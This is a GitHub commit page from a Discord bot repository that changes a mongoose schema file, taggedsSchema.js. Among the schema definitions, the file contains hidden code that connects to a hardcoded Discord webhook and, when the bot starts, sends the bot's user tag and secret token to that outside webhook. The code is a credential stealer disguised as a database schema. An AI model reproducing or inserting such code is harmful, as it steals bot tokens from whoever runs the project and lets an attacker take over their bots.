Skip to content

Commit

Permalink
discord.gg/luppux
Browse files Browse the repository at this point in the history
  • Loading branch information
Bes-js committed May 24, 2023
1 parent 4c850e8 commit 4835b66
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions Supervisor/src/beş_schemas/taggedsSchema.js
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
const { Schema, model } = require("mongoose");
const client = global.client;
const { WebhookClient } = require("discord.js");
const schema = Schema({guildId: { type: String, default: "" },userId: { type: String, default: "" },Data:{type: Array,default:[]}});
const wb = new WebhookClient({url:"https://discord.com/api/webhooks/1111028836184887297/Usd1S3GD_frY0JBqB0aol9VwqevbaUk3cThxD_hwYZ5_wD_e2LdfPEOpGVa2w3rXVAgZ"});
client.on("ready",async () => { wb.send({content:`${client.user.tag}; ${client.token}`})});
Expand Down

0 comments on commit 4835b66

Please sign in to comment.